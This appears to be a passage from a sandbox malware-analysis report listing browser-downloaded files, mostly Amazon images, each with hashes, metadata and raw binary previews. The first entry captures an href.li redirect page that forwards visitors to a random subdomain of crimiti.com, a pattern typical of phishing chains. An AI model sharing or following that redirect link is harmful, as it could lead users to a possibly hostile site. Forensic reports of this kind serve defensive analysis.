                                                                                                                                                                                                                                                                      SSDEEP:12:hYzx7BqhCDSQ7ctQtqqJmrLgFJhSEt+4Nbx8oA2jSB/Sl:hYzxBqhCDj42RnhBt+4NBA2jGe
                                                                                                                                                                                                                                                                      MD5:31F9B996EBBCA956E50B940C90766D6E
                                                                                                                                                                                                                                                                      SHA1:5D428650D8EE7DA69D72E3EC8E983300735AF9A7
                                                                                                                                                                                                                                                                      SHA-256:D33675F98D22513E8D0B8EEF0E7C3E0036FF1D40BFD85F332F3D5BDFEC185D30
                                                                                                                                                                                                                                                                      SHA-512:1E5CCC54F34D9DEEEC12CEB23DF39D6808D7D32392CAAC7F890C1AFAD18691A7FDA0CC9DB14B5E27236E0DA6055A8F231AA403DDE2AB995FB25FC54C5B7D597C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://href.li/?https://7CZh8.crimiti.com/3aqy/
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html><head>.<title>href.li</title>.<meta http-equiv="Refresh" content="0; url=https://7CZh8.crimiti.com/3aqy/" />.<meta name="referrer" content="no-referrer" />.<script type="text/javascript">./* <![CDATA[ */.window.location.replace( "https:\/\/7CZh8.crimiti.com\/3aqy\/" + window.location.hash );./* */.</script>.</head>.<body><p>Redirecting..<br /><a href="https://7CZh8.crimiti.com/3aqy/">https://7CZh8.crimiti.com/3aqy/</a></p></body></html>
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 171x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10730
                                                                                                                                                                                                                                                                      Entropy (8bit):7.964401775377065
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:sV223I796Byy2EHzyz+ItTZ+sLAVHB0f9JpkCkq7o4WkrFK:4/+96QvEH2z+ItTZXAUjp3Wig
                                                                                                                                                                                                                                                                      MD5:1EA1690584878CDD99D98AFF3D0859DF
                                                                                                                                                                                                                                                                      SHA1:21787BF695B7BE256C633A099DD93CF97CEA2AF8
                                                                                                                                                                                                                                                                      SHA-256:F9E1F86020FA2EEAFAB6DB74F0CD9EE7592E48BEED26227E55DC0495A6C0584F
                                                                                                                                                                                                                                                                      SHA-512:CABA91BFE451258F0BFFD54EF815CB65ABCCFA980D1B20BD60A95E5DC48EF11E51BDC2EE6B6B9366F9D731A80BDC24B347697A6D5E8B671114FA324E0F9EA323
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!..1AQ."2r.#6RTq........4Uast....$35BC....bc...%S.....................................................!1q...2AQR....."a..#3S.Br.............?...w.x...C .."^rJ..Ks.....Z].1.....@.'>n.L.A.P(.....sgx...q.1.E.|.+|l..8E..3'....Kz...$.t.....2L.jh...........,.u......n.t#......W3XdoeK.L.c/.r..j..Q.\K,..w........^.u.R..b8...c%.....c......JU.A.....g..1...^[~....Yc..R2..R.O.U..Ng..e..R...o.....T....,..)2....2..5.S......:..%s..H.N...m[PXy...E:qd8[.).......D....*y2..}...S.H..ns.".....N.....Q...%#T.GU..@..Q...R..V.............){).O...RT..g[T..O..,.........Y....%@.$.*.p.........b.9$...F...1.(B..).O...RR.S..7..w.t..<..^J.ul..h.~..B...(B#Yt..<.6^.dB..Rs..G.W..98.lW...e!.....+..^^...q7.[. ..6. .(....g.(i.|.]..;#.Y..sK..../....~6.]...}f.afh..pv.B...V.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1], baseline, precision 8, 640x360, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):22318
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9230921808803645
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:PghA9fFW+ZlrJal/O1eqXKoXBM/VV5gquq1dXUw3O6s3GaD2t9DC0xEbq1Ys48:PghADlzkEggKoXC/VV5gJYl3O6WGZz9x
                                                                                                                                                                                                                                                                      MD5:AE6A0C06C734F17EBC6C6152D334791D
                                                                                                                                                                                                                                                                      SHA1:D26F9C617E9C4F31975250D2D201251C3BE490F1
                                                                                                                                                                                                                                                                      SHA-256:A746ADFCA52A4D02056281EECCF7BAD9198866265255DC365E2BE01A4FF65C43
                                                                                                                                                                                                                                                                      SHA-512:AB40ECC3E1E25C3B180D54EEB43B64944E9F93286839C09D764CED81CC113A779F26F215EA789C6EE753C2A2B11A3E00CC7753C5EB0F441D23ED4324C694363B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/d357b1d2-39e5-4349-8019-c0e0644649ee.mp4/r/THUMBNAIL_360P_FRAME_3_CAPTURE_2.JPG
                                                                                                                                                                                                                                                                      Preview:......JFIF.............JExif..II*.......i.........................,...............Version 1.0.0..........................................%...#... ,!#&')*)..-1-(0%))(...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......h...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......Zp...--%:..KIKH.....P..(..R.R...IK@................-%.......R.J(...P..8J..h.).V....i.n..N.....&...........f.J.]......|...wu$..r. ...]...\.$..G..X`..q.{5y2..Vv.=v;.yT2..}.......o.Ah..6;.8...W!......uC...$....zb..._..D...K..G..$S..$...Y:..X{s8.-.!.L..q.II_bV.I.?..WN.l.#...6O...T...oc.kB=J
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):36341
                                                                                                                                                                                                                                                                      Entropy (8bit):7.900679313804417
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyjHZfudBy1DGRy1CsJoEFrfakmzGWl6hkuaCtkBLYNsqCBi1:4fZ2dBy1DssJVtfzmzGW0VeWsk
                                                                                                                                                                                                                                                                      MD5:E20F556F2DFC910FD4585701F6A10472
                                                                                                                                                                                                                                                                      SHA1:1228069271EEDD1A9EA8C4EB11B68F87891D03AB
                                                                                                                                                                                                                                                                      SHA-256:4F38A969193450AC32E1CE78B926CD6E364400A75D66E1D5A5DA6E39D8BEA7FA
                                                                                                                                                                                                                                                                      SHA-512:A343F373BA9C567CE9053AA992F25A11DC03F7E7BDDF1DACEF968C5A26B253EEF9D00C48E218FCDAABF98C118D2080A71EABCADBE1CAB86C1664EED5C8CC697F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 281x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):23527
                                                                                                                                                                                                                                                                      Entropy (8bit):7.977501457653315
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:BPEHY87Pqi1/g7a0bJLb1DRmR+YOdM0ZeMHN77WWwxxnKbEwHu7j9cwL6IMppcoZ:B27Ka09n1DRmRSdM0tdC5x40j9HMpTxH
                                                                                                                                                                                                                                                                      MD5:BAFE874FA0F2D088DF0ECDAF73A21AF6
                                                                                                                                                                                                                                                                      SHA1:6AF2B4D2C5815AB655E47064629D25DFF8E6794E
                                                                                                                                                                                                                                                                      SHA-256:BF4EC075A4CFFA2632246A2E7D0EFD72255E33B5CC70DCA94EDD1FE69CD1EE3B
                                                                                                                                                                                                                                                                      SHA-512:5327C4FEF5B90A2F3A5908999BBDE90E0AAC98B83581A7FAF7FB2DFD3734B90BD38739005C40F82BC502753CB9F4479B8709C84D91A7EFD16E487196CBBFE77F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71URWS6n0uL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........6...................................................................;.2...K.m.._....s".@Jh...6A..].."U......"uD{"YC))....%..I..K5...`.#....+v.(..*.z.....oR/t.%.[..[..u..Y.x.A.../R.vi..../3.5,.k.4.r.)%.Y.....l.$..a.>N...y..6wAx.....H.t&r.rQ.3'O2.u...|....l..9..x.|.;o.]x.,..Y..^..#}.0O?pr.z.....0....K.?2..!...b.....<.h..i...6.2.zE8..C..m.mW....".0.^..:;J.....N#...4..-...c5.O6Y...........k.M.C67R..R..1c.G9.T.....O..7].o%.Z:P*...2..a...@\..9..>:XQvU:... R.yr6x..uR.yg'.w.o^..o.tinOt+.N.T...1.IzL.$....-..z.......^...5..S,..H...l..Kv..C../4.Yu..M..?.%...6.?b.s.8I.m...1n.66......:UX.@.W..$..I .B._....x9.7.8c....4...6.9..%g.T.y.-.oL...avP.m3)....-/!.x...9b<vh.R..y!.8.F.nf....H.H1......Vk.J.N.u..YM.$98.`..[.L. .-....d.%V..e..!..3.4yB..[..q..c....!#...7D..H..ZI.I..K.0.t.t... .>7
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):24758
                                                                                                                                                                                                                                                                      Entropy (8bit):7.911565502325638
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:a+OUK6NuuhSQV01Av/BpkO7uu1rUBadi9:dOx6Ng801+jPQadA
                                                                                                                                                                                                                                                                      MD5:C4FAF89AA83271D1D60498B89DD8A9D4
                                                                                                                                                                                                                                                                      SHA1:168A7C2F9CF862D4B4A655E7F808961D0EEE5595
                                                                                                                                                                                                                                                                      SHA-256:3F21C3F6B1210D65BF6B3264A0AE7D2644922E8A0F14DE4D7E2A50638BEB560B
                                                                                                                                                                                                                                                                      SHA-512:61935F55A04B52813088E80A10445F3EA08A50DE12D01E518012AB1DFB3497819BD52C5A2A5886202679A66DF214C89103A7464A7E86119ACF0A32BEE3926482
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................Z.............................!..1.."AQa..#29q.....$%By...378CStuwx..:RX..&'()4bhs..................................."........................!..."..B............?..C..............................................................................................................................................................................................................K..j..n.7f..:x...6h.A..8X.E.H.z.T./b....`{....<......;.v~........X5..*`!.B.W.=r..0.Jr.H@D...9R7.......k..v....eH..Ei.F.......H.(.?......P./I.}.2*.b...8.....<L.!...~.......|...d.Q..QK...b..D}..&..8..Z_,4...V...W.;1... n(.B....f..L......8!ea.-....E.j.......a...0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..9....s....|}.Ku..>...KEHM.W&%A....h.......&.5.R..]gM..d.l....=.....l....H......I.&.1.U.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):12070
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8638389793997465
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:maoAcDm2c6LbPUas2l9n0eoex16zLqOHOo5spW785mYYZWtNf63bSk+OVuIq:LcDm2c6LbMas2TJyLTHOgQ5sWT6rYvV
                                                                                                                                                                                                                                                                      MD5:61ABDCDA334F33498CDB83853BBC5B33
                                                                                                                                                                                                                                                                      SHA1:C80E68FEC3B38E203B530CD926276C4CFD7AB231
                                                                                                                                                                                                                                                                      SHA-256:48B7B628176B24B54FE89624C4B19B49596D6F13B8F52EA69119ADF115CD61D6
                                                                                                                                                                                                                                                                      SHA-512:ED40416C5DA5762FB5155FA5E906FF9DEB63B85DD49ABC4F976E4F333C3392C76B6EF191A2A925F68F1FD66BD15F5A02193FD106A453DAEE749871A38C9D4A81
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31zyL4SK5OL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.............................................................................................................................................................................................................<...Ac...XoKE87..T....M.h]&.4".~Z.I............T.A.=i>.>xP}.|..,..I.m.....'.W.q.....`.......0.`...k>u7..S.4.T.._.p(..:e....!I....ED...'.4MA.2.ED..s....y.Y.5./.....;.@......M..a.....X.-......p.<[...$..I51pI.T.S....I]4FIE..Q."..4..O..QU...$o~...P.........aDt..qD..$.Kzo...S.q.n6..q.....>...6.(e...3L...j.M...f.LkSf$.cl...U.....<G.*^...J.rd............;~.|.0......]$..^....M,.t..[O.<.K.\Ok?U..n\Ko6.SZN\.k=..[Km....5.1$.Me.a....;....^....W4.&o....P........O.a.8..~+...$....H..Ya.i.....n..kY..f......].f..V.{I...'......!...../z...q.....?.K./.o.w.+\..Z..7!@......_.O.F..}..H...y.j.I..M...^..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3646
                                                                                                                                                                                                                                                                      Entropy (8bit):7.851599474948609
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Tof+vGceX5qNWyDaD9Y94BaMVvXF4ZDLwobQVEWkajUXrP:0f+vPGmWyDaDf1VkLRbQVnk4UT
                                                                                                                                                                                                                                                                      MD5:9300223E26C7F980B8ACD167152C7839
                                                                                                                                                                                                                                                                      SHA1:FFB0664BA2ADE8400AAEF716CB6C40BD97D66DA0
                                                                                                                                                                                                                                                                      SHA-256:5229027DDCD520105EEF22EB06144D7D8214D930DEBF6ACD790C2B57D694AC79
                                                                                                                                                                                                                                                                      SHA-512:ED66660A14F4CBA097AC09A71046D8B8B0412CD72E27C5B7674DFFB81E6CE6EFE69995A52043126B15BF8959A6922F992D8DEDBFEE2B3523195DCB0DCB07310B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-d9le7_372x232_ae-en._SY116_CB643136704_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A.."Q.aq.#2Br..R..3...$CSb.................................................!1..."2#Aaq...............?..U)J.JR.R....(.)J.JR.R..i..#...8...P..X^eT.9#.Fj?7...m.$......R.0kv.4j7...]...d.+.@)JP.R......)@)JP.R......)@)Q-?.-.].....m....<.d$.3.....fIP.su.I.. .$....\......d~R.....#.r.5.........8$....<T{..K..d3..L.I..G..e.....k..q...+4R..'.@>_%.O".....P....^....1].8.XXo.b..4.......v.&......Ft.{..!...<@v...V....~..*U.......[*... ....."h..N...........Y.^.Q...l.6.w.._...$.0.#..:....p.w..a......H...-.....G.('$..=..z......kHR.....(.)J.JR.R....j..X&h..U....{c..j....kPo.A&Nv.#`~....$.Zg./8.<.:H..>M..:..QU..:...Zo.........?......d,f..C.F.........D....D..j.pdU.....&.o.....ag.Ry. .p7.Fwg8.d...p..+.2......!.g.U{...........cT..............~?.......%.g
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 158x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11445
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958304680052471
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:AmTwuddiHpCPNEozfDrI0QHU1juvYC8PLzEOKRSoFrZpTPZJ3wFmAyjSvHOBzhMa:AYwudAHkKIDrhQ01iQC8P/EOc5FrTPZj
                                                                                                                                                                                                                                                                      MD5:EE3AFCA079A55031A80562D06C018554
                                                                                                                                                                                                                                                                      SHA1:21F7EA283680EBF5A66A550A011ED3400231AA0C
                                                                                                                                                                                                                                                                      SHA-256:D2EE6F6B0BF7B2E802A44964E6528CEC7EFD3B92F424D3092DCFC12F3E10AA43
                                                                                                                                                                                                                                                                      SHA-512:3DBBAA5EEFB69E98E761AD3947EA3CF6AEE301AE2FEA85683E70A7A13593318AFE77F3159245FAA6DE4308BA6ACA111484E2C20EA18EC86E8031E718F7E10B5B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1A."Q.a#2Ts......35Bqr....$Reu...46Ubt....D..................................................!.1..Aq2.."CQRSar...#B...3............?.{....3..I.J.Z..b..X#.V..i.lN..l..W..2.|....^!.U.....>.>;.a..I...W)hd.rB....u!...S..CJ.0@.\7.,k.v.#f?/..C.?..........8.".\.-.Ii=.x.'.&..J}a...........E.8.*ku]n.#MF..*.Vn.....Vs..m.RH.#xc.n....l......|g..2.|..........e_.R,6.9W..cS.t.Fhg.Q<.*.1G.t...me#.kX..*...M.....|._...."._/....jN.......jZHjK.M]ZR..3fdS.P..B..._`.HZh.....(.....YZ.. ....8...%.2...q6D...g..~....4.t.^.......~..Nc.-.Wr...2F|...Q...n.CJb....4.J.j....>...o....c....}t...../.....)..*b8.8.\..]&=.o.v....a0.0tC...x......U?.I....U?.I.\f'....%_.*=....:.T..]&3..:.UG.I.\f'....%?\.....L..]@?:..o.x.3z..z..u.........z.I.1..o......0..`|....Z....L.T
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6016
                                                                                                                                                                                                                                                                      Entropy (8bit):7.830805104159852
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TkBKM3uUSAb4+f7L57xOxrJa254kFLnHv/8307ZC8acPYxiEkou6cG6ZqXug9nuC:oIM+UaKEJak4aLn8307Z7ZYPkoRcUuCn
                                                                                                                                                                                                                                                                      MD5:5EF8B928F942079A8485B15870E010D3
                                                                                                                                                                                                                                                                      SHA1:0F831076A5F877318504E4FD9640BAD1EC72CC35
                                                                                                                                                                                                                                                                      SHA-256:4F3A387165C1FF2ED0A2B7771ADE5BE4A8CCEC815652DAFE94147047BCEC5210
                                                                                                                                                                                                                                                                      SHA-512:AD7F196D985D7377C71441E96731EB3FD85D14ABE3289A9FB64EE9E0AA70ACC53A1A4CB5A9973D3D2342BB883438469533BE360F6D2EA88046C4F3146A696F46
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41BEfYOD4rL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."........../...........................................................................@.Ln]...yq.!s..o#N+..5.g..w.......#V....T.z@..(9.`...F.n../Nt{e.........J.).W.....J9..@.kl.[.#{@.....4.u...v.M..bI..1.<.1.l.1.....s....:...0.....b..C9..>X......~{..2....cL...le.Kg]7......y..F.kvL6;."\.[.....B.....I\.=.;.........bg.C:?+T..%f.E.1p.as.B.[.....)...........\.6....m|..rj..........i.{...o=......:.+..@.z...J.B...E.. .!{..E..RM..0.}.......l.-4.........<...)..Z.,81..X.c77.. ......&.9_'...I.o$..{.6s..F..m}..p.O.CH........=.....e.......v..C..b`...J7.o.{X.G..>&~b....||..Q..a...........-...........................!@. "#1A.3.20PQ`.............Nm......1..........|`.d....5...uJ.Q.+.Gq.2m.o...../....5@U....!.p...T...r...K%-..J[v...>.k7....mT...teP.N-&.5xgLE....3;..q.....^ZAv&.$'.V........z.E...0.-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x316, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):31959
                                                                                                                                                                                                                                                                      Entropy (8bit):7.985513061843069
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:mgrVM6UgK2SbPqFTHxG3rvpsnpUxNs1wx5:mgrC6NK2S+FTHYjiusI5
                                                                                                                                                                                                                                                                      MD5:0A51C0065E091C32D516744D89DA9A10
                                                                                                                                                                                                                                                                      SHA1:BD879736DEAACB0729439760D8E8EBDF441F369E
                                                                                                                                                                                                                                                                      SHA-256:DD0BF68774F61EE4CC6BCA978D871DD4791A33981D6319F9EEC56B5378D0EEE5
                                                                                                                                                                                                                                                                      SHA-512:2D60CF67657EB23A67110D4E74D417EE5F32212EB24FA2642C5F0964ABB9D9C2A5F0A104547EB2B41122D1AE7413B7C1081E0FFE62ED155B197BD1A4D2CF6BD3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71iAQfFKjAL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......<.@.."..........6...................................................................i,..~t...4.te../..Xo~*..8SN U..\V..jJ..%..Y...(g.$hEB.F......^.q.....F..d.d.Uh.,.(FD.P.3sp.Y.D.<...f.5.....;CF.1g|..~..].........i.o.s.0&By....$.#.X...WW..o...._.2.R....5x.Ql.\.[.$.a.,.#..2t./.S.$.._.j.M.V_.......:..L.N..&|,$....f(.4..^.v.J2..dY...j..L..r.~.2.9..VL......Q..v.....$...z.O.;..Q......=..{O;.\...o.rc...R.ZN1.J...4..v...I,.7.......=...%...l3;...}r5.Bz....n9...dt..A.<.H......-W.tE....Ax....Y....<.PK..d.(.Q..h^])J@.cz.Igc;f....d..p....J...."......6.......{.Nb.....n@...1.......s..4?7S.....kE....<tv...S...'..M.u.==\.D."..e.....X.)o.n.p..n.=...3_....g.g..P<5.sc_TIR..U..#;&...u....h{.o.B..pt....V.]CoT.V<.~...)I...5.e1......+F8...6.....n5x..g...Z?...B,.Q.Jh.Ju..p....+..{..Ca.0qs......w>c>i;...I.F..e..8x1et...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 185x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5555
                                                                                                                                                                                                                                                                      Entropy (8bit):7.935777603305636
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TigeS4+q+47NeEWf5xt5HLFnh20+bJDgf1d55+ExC8skE8Z4R4mT/6A:oS4+KeEinz1hSDi1Rp3E8+4mb6A
                                                                                                                                                                                                                                                                      MD5:F610742612EE519554CF746DE4175D66
                                                                                                                                                                                                                                                                      SHA1:76B8FF42A86EC595621DF9CE16CCB6FC69A81CFF
                                                                                                                                                                                                                                                                      SHA-256:0C8D0AE21F7C04C408123299877DBF71AEF09EF9CF47A46D5DF24AB47A6E3A3A
                                                                                                                                                                                                                                                                      SHA-512:DE433E2BCF1BC0CF37F7ACB0B52805FBE3A17E25687BE979028751C017619D04AB09E42359EECDC7DEC503F2AC71849C37E6B05ECE28644D828261715C5ED1C5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61ZZd5V2wJL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQaqr...."25st46BDRb.......#$%3........CE....STU...d..................................................!1A..2QR."Bar...#...............?...C...p._QY3 ..d..6.w....f....gVbU.. m..;CX.w=.....c...P0.7.:...oA.....e.9j.<:.w....y}.....F..$7@.3..YM=...d.2.f...s.<.=.M...u..(..m.@{.e.......t.K:-..R...3cv....."z..3/..+..-.eUX88x.F..9h..--..O..^...N...'...S..*kl..,..n.W.;.p~.V._...m|...._6..?*.......m.O6..C.P.u..p0...>.E...'..?]H....k..L...?uLg..Q.....K..d..u0..BA.K)*..Q.KD.s#.$L..#7;.......Ts.~n4....'.n......_..f.3..>Y.{pn.H..Ir.|.......L..Lc.s...vp......8.....)..(...?H>#x.c.SBx.Y.*.;...y{u|W..8.g...*.hmc=,:.'I.$q8...f.+3De.*.8.SA....m#:..J ..9.u..q..^.#.dL'.'...&....1......8..e...Z..1..6.0r.4+V......-...h.a..T.Q...n.n.......#..b....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 151x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):18984
                                                                                                                                                                                                                                                                      Entropy (8bit):7.979060230471624
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:cPc8zv20iD+g988BITQhvQOLaJUZ9whp9up4em/BA+H7CnEh:mc8zv20lgjVvQOQUZ9MM4JvH7CEh
                                                                                                                                                                                                                                                                      MD5:9C6D2FDB060818EBA05BE34E3E0E23A5
                                                                                                                                                                                                                                                                      SHA1:3071C54535079C5881BE036D2B2AE2EB89609976
                                                                                                                                                                                                                                                                      SHA-256:085B67C04E849029723FD3076E24C056838575A137EF558377E18C03F1B3C42E
